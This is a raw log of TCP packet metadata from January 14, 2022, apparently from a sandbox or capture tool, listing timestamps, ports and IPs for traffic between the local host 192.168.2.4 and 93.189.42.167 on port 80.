Jan 14, 2022 00:15:15.245990038 CET	49793	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:15.297631979 CET	80	49793	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.326554060 CET	80	49793	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.329979897 CET	49793	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:15.330230951 CET	49793	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:15.381886959 CET	80	49793	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.666871071 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:15.717310905 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.717442036 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:15.717612982 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:15.777147055 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.777209044 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.777260065 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.777288914 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:15.777311087 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.777364969 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:15.777378082 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.777430058 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.777502060 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:15.777673960 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.777705908 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.777770042 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.777822018 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.777838945 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:15.777873993 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:15.827953100 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.828010082 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.828059912 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.828095913 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:15.828113079 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.828165054 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.828216076 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.828236103 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:15.828269005 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.828278065 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:15.828330994 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.828382015 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.828385115 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:15.828432083 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.828483105 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.828537941 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.828540087 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:15.828584909 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:15.828588963 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.828641891 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.828691006 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.828738928 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.828754902 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:15.828792095 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:15.828792095 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.828845024 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.828893900 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.828943014 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.828944921 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:15.828990936 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:15.879357100 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.879416943 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.879450083 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.879522085 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.879544973 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:15.879570961 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:15.879578114 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.879631042 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.879683018 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.879683018 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:15.879739046 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.879791021 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.879806042 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:15.879843950 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.879894018 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.879940987 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:15.879941940 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.879986048 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:15.879995108 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.880045891 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.880095959 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.880141020 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:15.880145073 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.880184889 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:15.880196095 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.880244970 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.880292892 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.880340099 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:15.880342960 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.880387068 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:15.880393982 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.880445004 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.880496979 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.880537987 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:15.880547047 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.880588055 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:15.880598068 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.880650043 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.880700111 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.880747080 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:15.880748987 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.880789042 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:15.880799055 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.880848885 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.880897999 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.880939960 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:15.880956888 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.880996943 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.881045103 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:15.881050110 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.881092072 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:15.881099939 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.881150961 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.881200075 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.881243944 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:15.881251097 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.881293058 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:15.881302118 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.881354094 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.883488894 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:15.931910992 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.931966066 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.931998968 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.932065010 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.932102919 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:15.932117939 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.932143927 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:15.932173014 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.932225943 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.932229042 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:15.932277918 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.932329893 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.932379961 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.932384014 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:15.932425976 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:15.932435036 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.932487965 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.932540894 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.932590961 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.932596922 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:15.932643890 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.932646990 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:15.932696104 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.932748079 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.932796001 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:15.932797909 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.932843924 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:15.932852030 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.932904005 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.932955027 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.933020115 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.933033943 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:15.933078051 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.933109045 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:15.933131933 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.933178902 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:15.933182955 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.933243990 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.933293104 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.933300972 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:15.933342934 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.933393002 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.933428049 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:15.933450937 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.933485031 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.933542013 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:15.933546066 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.933598042 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.933598042 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:15.933648109 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.933696032 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.933703899 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:15.933747053 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.933795929 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.933845043 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.933873892 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:15.933926105 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.933985949 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:15.933990955 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.934037924 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.934068918 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:15.934089899 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.934139013 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.934186935 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.934199095 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:15.934231997 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:15.934236050 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.934286118 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.934334993 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.934384108 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.934386015 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:15.934429884 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:15.984785080 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.984859943 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.984915018 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.984963894 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:15.984966993 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.985028028 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.985079050 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.985094070 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:15.985131025 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.985131979 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:15.985183954 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.985234976 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.985285997 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.985294104 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:15.985337019 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:15.985338926 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.985392094 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.985441923 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.985491037 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.985507011 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:15.985543966 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:15.985544920 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.985596895 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.985647917 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.985697031 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.985701084 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:15.985749006 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.985753059 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:15.985801935 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.985882998 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.985934973 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.985943079 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:15.985986948 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.986037016 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.986046076 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:15.986087084 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:15.986088991 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.986149073 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.986197948 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.986247063 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.986248016 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:15.986295938 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.986304998 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:15.986346006 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.986393929 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.986442089 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.986444950 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:15.986495972 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:15.986500978 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.986552000 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.986603022 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.986654043 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:15.986660957 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.986712933 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.986716032 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:15.986763954 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.986814976 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.986864090 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.986877918 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:15.986922026 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:15.986923933 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.986974001 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.987025976 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.987076044 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.987083912 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:15.987127066 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.987145901 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:15.987186909 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.987236977 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.987297058 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:15.987297058 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:15.987354994 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:16.037652969 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:16.037702084 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:16.037733078 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:16.037787914 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:16.037838936 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:16.037919044 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:16.037934065 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:16.037970066 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:16.037971973 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:16.037995100 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:16.038026094 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:16.038078070 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:16.038130045 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:16.038153887 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:16.038184881 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:16.038223028 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:16.038238049 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:16.038291931 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:16.038311958 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:16.038343906 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:16.038395882 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:16.038409948 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:16.038449049 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:16.038513899 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:16.038562059 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:16.038582087 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:16.038614988 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:16.038665056 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:16.038675070 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:16.038727045 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:16.038753033 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:16.038779020 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:16.038837910 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:16.038887978 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:16.038903952 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:16.038938999 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:16.038974047 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:16.038988113 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:16.039051056 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:16.039067984 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:16.039102077 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:16.039136887 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:16.039180040 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:16.039231062 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:16.039275885 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:16.039283037 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:16.039334059 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:16.039351940 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:16.039400101 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:16.039448977 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:16.039482117 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:16.039509058 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:16.039562941 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:16.039583921 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:16.039622068 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:16.039674044 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:16.039691925 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:16.039726973 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:16.039776087 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:16.039836884 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:16.039836884 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:16.039897919 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:16.039933920 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:16.039947987 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:16.039999008 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:16.040050983 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:16.040065050 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:16.040103912 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:16.040129900 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:16.040157080 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:16.040206909 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:16.040245056 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:16.082479000 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:16.090420961 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:16.090487003 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:16.090548992 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:16.090560913 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:16.090616941 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:16.090672016 CET	80	49794	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:16.090672970 CET	49794	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:16.090718031 CET	80	49794	93.189.42.167	192.168.2.4
